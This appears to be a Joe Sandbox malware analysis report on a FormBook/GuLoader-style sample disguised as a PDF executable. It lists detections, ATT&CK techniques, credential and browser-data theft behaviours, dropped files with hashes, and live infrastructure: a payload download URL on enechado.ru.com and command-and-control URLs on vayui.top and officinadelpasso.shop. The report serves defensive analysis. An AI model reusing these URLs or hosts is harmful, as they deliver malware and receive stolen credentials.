            Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
            Process Injection            		1
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		1
            Access Token Manipulation            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		312
            Process Injection            		NTDS3
            File and Directory Discovery            		Distributed Component Object Model1
            Clipboard Data            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets24
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562046 Sample: S#U0130PAR#U0130#U015e No.1... Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 33 www.vayui.top 2->33 35 officinadelpasso.shop 2->35 37 2 other IPs or domains 2->37 47 Suricata IDS alerts for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 4 other signatures 2->53 10 S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe 40 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 31 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->31 dropped 13 S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe 6 10->13         started        process6 dnsIp7 43 enechado.ru.com 103.83.194.50, 49743, 80 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN United States 13->43 65 Maps a DLL or memory area into another process 13->65 17 cXGDMXIloFhOE.exe 13->17 injected signatures8 process9 signatures10 45 Found direct / indirect Syscall (likely to bypass EDR) 17->45 20 sdchange.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 cXGDMXIloFhOE.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 39 officinadelpasso.shop 195.110.124.133, 49839, 80 REGISTER-ASIT Italy 23->39 41 www.vayui.top 104.21.95.160, 49875, 80 CLOUDFLARENETUS United States 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe15%VirustotalBrowse
            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe5%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll3%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            enechado.ru.com1%VirustotalBrowse
            www.vayui.top2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.vayui.top0%Avira URL Cloudsafe
            http://www.officinadelpasso.shop/vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd0%Avira URL Cloudsafe
            http://enechado.ru.com/tk.bin0%Avira URL Cloudsafe
            http://enechado.ru.com/tk.binJ0%Avira URL Cloudsafe
            http://www.vayui.top/4twy/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            enechado.ru.com
            		103.83.194.50
            		truefalseunknown
            www.vayui.top
            		104.21.95.160
            		truetrueunknown
            officinadelpasso.shop
            		195.110.124.133
            		truetrue
              		unknown
              www.officinadelpasso.shop
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.officinadelpasso.shop/vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wdtrue
                • Avira URL Cloud: safe
                		unknown
                http://enechado.ru.com/tk.binfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.vayui.top/4twy/true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://ac.ecosia.org/autocomplete?q=sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/chrome_newtabsdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdS#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalse
                      		high
                      https://duckduckgo.com/ac/?q=sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icosdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://enechado.ru.com/tk.binJS#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalse
                              		high
                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdS#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalse
                                		high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.ftp.ftp://ftp.gopher.S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorS#U0130PAR#U0130#U015e No.112024-pdf.bat.exefalse
                                        		high
                                        https://www.ecosia.org/newtab/sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.vayui.topcXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            195.110.124.133
                                            		officinadelpasso.shopItaly
                                            		39729REGISTER-ASITtrue
                                            103.83.194.50
                                            		enechado.ru.comUnited States
                                            		132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                            104.21.95.160
                                            		www.vayui.topUnited States
                                            		13335CLOUDFLARENETUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1562046
                                            Start date and time:2024-11-25 07:07:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 20s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:SPAR No.112024-pdf.bat.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@7/10@3/3
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 67%
                                            • Number of executed functions: 51
                                            • Number of non-executed functions: 290
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            195.110.124.133Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                            • www.elettrosistemista.zip/fo8o/
                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                            • www.elettrosistemista.zip/fo8o/
                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                            • www.elettrosistemista.zip/fo8o/
                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                            • www.elettrosistemista.zip/fo8o/
                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                            • www.elettrosistemista.zip/fo8o/
                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                            • www.elettrosistemista.zip/fo8o/
                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                            • www.nutrigenfit.online/2vhi/
                                            RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                            • www.nutrigenfit.online/2vhi/
                                            glued.htaGet hashmaliciousFormBookBrowse
                                            • www.elettrosistemista.zip/fo8o/
                                            proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                            • www.nutrigenfit.online/xtuc/
                                            103.83.194.50ZAM#U00d3WIENIE nr 594uzzf485-pdf.exeGet hashmaliciousGuLoaderBrowse
                                            • passion4dance.ru.com/POL.bin
                                            ZAM#U00d3WIENIE nr 594uzzf485-pdf.exeGet hashmaliciousGuLoaderBrowse
                                            • passion4dance.ru.com/POL.bin
                                            CONTRACT-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • passion4dance.ru.com/qa.bin
                                            WTsvUl9X8N.exeGet hashmaliciousOski Stealer, VidarBrowse
                                            • 9entrevera.sa.com/o/
                                            SecuriteInfo.com.Win32.SuspectCrc.30843.5697.exeGet hashmaliciousGuLoaderBrowse
                                            • insula.sa.com/sgp/xkxkBkUGnvBunHoZmLt35.bin
                                            doc_order_sheet_sn8577THC_13122023_pdf_0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • ytgz5.sa.com/gBuCeYv217.bin
                                            awb_dhl_shipping_documents_PL&BL_13122023_pdf000000000000000000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • ytgz5.sa.com/KaIWGuoaPXGhlzSd30.bin
                                            PmX1jHdUnS.exeGet hashmaliciousOski Stealer, VidarBrowse
                                            • 9enternecera.ru.com/os/
                                            REF#117300-100823.xlam.xlsxGet hashmaliciousUnknownBrowse
                                            • sandiisells.com/.well-known/acme-challenge/cx/raf.vbs
                                            DC0376654883101.vbsGet hashmaliciousUnknownBrowse
                                            • fumigueg.tk/scss/pQYcmyNJ26.pfm

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            www.vayui.toppurchase Order.exeGet hashmaliciousFormBookBrowse
                                            • 172.67.145.234
                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                            • 172.67.145.234

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            REGISTER-ASITCertificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                            • 195.110.124.133
                                            Magnetnaalene.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 195.110.124.133
                                            NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINhttps://recociese.za.com/wpcones/excel.htmlGet hashmaliciousUnknownBrowse
                                            • 103.83.194.50
                                            LPC Scanned Docs-Copyright #U00a9GNP.CPL.dllGet hashmaliciousAsyncRATBrowse
                                            • 103.83.194.50
                                            08cb9f0ed370a2daea9dc05fa08aedc2a10b1615.htmlGet hashmaliciousUnknownBrowse
                                            • 103.83.194.55
                                            sora.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 168.81.254.150
                                            Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                            • 103.83.194.55
                                            CARDFACTORYAccess Program, Tuesday, October 29, 2024.emlGet hashmaliciousHTMLPhisherBrowse
                                            • 103.83.194.55
                                            https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ==Get hashmaliciousTycoon2FABrowse
                                            • 103.83.194.5
                                            https://url.avanan.click/v2/r01/___https://drickly-com-dot-fluid-dreamer-410607.uc.r.appspot.com/?h=66LVKOwLflbMjYVoJBNTrXiW3CEpoRg_EafL_ygpoXil&fru;v=755/8c88*~*9&fru;w=6c5ghgij98cg/ffg&fru;E=6a766/89b55*~*9&fru;t=myyue8Fe7Ke7KBBB.lttlqj.htr.xle7Kzwqe8Kxfe8Iye7*~*jxwhe8I3ZR/bSIze7*~*xtzwhje8Ie7*~*whye8I859Oe7*~*e7*~*hie8I7/*~*Ize7*~*zfhye7*~*zwqe8Ifrue7Kxe7KfwrxywtslxyjjqBtwp.htrd.fnlzD___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo3NDhmM2FkMWRiOWU2YTNlMjE1YzgwMzRjMTliODRkZDo3OmNmNmI6NjYyMTE5OWZiNzU5MjU0NTE1ZjgzODM0ZWRlYjRmZDIwOWJmNTQ3YWUwY2MxNmU5NjFiZmExYjYzM2U0YzA0MzpoOlQ6VA#YmJyYWNleUBwcmVzaWRpby5jb20=Get hashmaliciousUnknownBrowse
                                            • 103.83.194.55
                                            https://url.avanan.click/v2/r01/___https://www.google.com.sg/zwq?v=7WZIz&fru;why=7WZIz&fru;xf=y&fru;jxwh=7WZIz&fru;xtzwhj=&fru;hi=7WZIz&fru;zfhy=&fru;zwq=frudxdgtqiqntsfuufwjq.htrd.n___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpkZGUwNjUwMWZkNDExNDYwNzZjMDZiMzcyYTg5ZmU1NDo3OjE4NDg6ZGQ5NzQ2M2JkZmJmZTM2MDBmOTU2MjU4MWJhNWIyZDA0ODAzMGI4MzllZGM2ZjkzYmIwZjc2YWQ5ZmQ2MDFhNTpoOlQ6VA#ZWphbWVzQGVuY2luYWNhcGl0YWwuY29tGet hashmaliciousHTMLPhisherBrowse
                                            • 103.83.194.55
                                            https://link-karix.unifiedrml.com/link/load/?uid=66f149a6a2cee777918b45c2-66f14b565f7b47ad77e978c0-66f14b0aa2cee705a28b4575&uri=https%3A%2F%2Fbluworldusabluworldusa.jimdofree.com/Get hashmaliciousHTMLPhisherBrowse
                                            • 103.83.194.5
                                            CLOUDFLARENETUSShave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • 172.67.177.134
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 172.67.155.47
                                            https://sites.google.com/mdisrupt.com/rfp/homeGet hashmaliciousHTMLPhisherBrowse
                                            • 172.67.195.202
                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                            • 172.64.41.3
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 104.21.88.250
                                            https://glorydaysaheadnnowx.us:443/verify/?verify'Get hashmaliciousUnknownBrowse
                                            • 172.67.196.133
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 172.67.162.84
                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 172.67.162.84
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 172.67.162.84
                                            New shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                            • 172.67.177.134

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dllReadouts.bat.exeGet hashmaliciousGuLoaderBrowse
                                              Account& Payment Transfer Details_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                Account& Payment Transfer Details_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  https://updatecdn.meeting.qq.com/cos/37a67c4f1858c83dff9f22a27bb8f27d/VooVMeeting_1410000197_3.23.1.510.publish.exeGet hashmaliciousUnknownBrowse
                                                    3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                                      3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                                        rjustificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          rjustificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                                            CI890892.6409410669pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              CI890892.6409410669pdf.exeGet hashmaliciousGuLoaderBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\k8457414

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\sdchange.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):114688
                                                                Entropy (8bit):0.9746603542602881
                                                                Encrypted:false
                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):3.81704362174321
                                                                Encrypted:false
                                                                SSDEEP:48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
                                                                MD5:3DD80DFF583544514EEB3A5ED851A519
                                                                SHA1:56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
                                                                SHA-256:86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
                                                                SHA-512:955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                                                • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                                                • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                                                • Filename: , Detection: malicious, Browse
                                                                • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                                                • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                                                • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                                                • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                                                • Filename: CI890892.6409410669pdf.exe, Detection: malicious, Browse
                                                                • Filename: CI890892.6409410669pdf.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....oZ...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):11776
                                                                Entropy (8bit):5.890541747176257
                                                                Encrypted:false
                                                                SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow\Bekld.Int

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):108400
                                                                Entropy (8bit):2.658480463898876
                                                                Encrypted:false
                                                                SSDEEP:1536:m2ntSllw3iTAjI+1YmIZd+8ecSD/H4QCFDgd/BsYXFRJ3xqq:P2C4spT
                                                                MD5:D9C1EAE360D5092BABF95AE6C59C6B40
                                                                SHA1:A8AEC2253394C81135BA3AC5E5329F0044D94158
                                                                SHA-256:E597A7750A85662AD1A04307A847474D947BA1367EC822438FFFB6DAAF6FE14A
                                                                SHA-512:72AF870662835FF1C5B4F1D42FA0BF0DF38D83BA277F58003FDCC24EB792D4D18BCF89C3268B317DCF0AFC6CECC519F83BD9AF95B5544D723BAEB555647CE6C1
                                                                Malicious:false
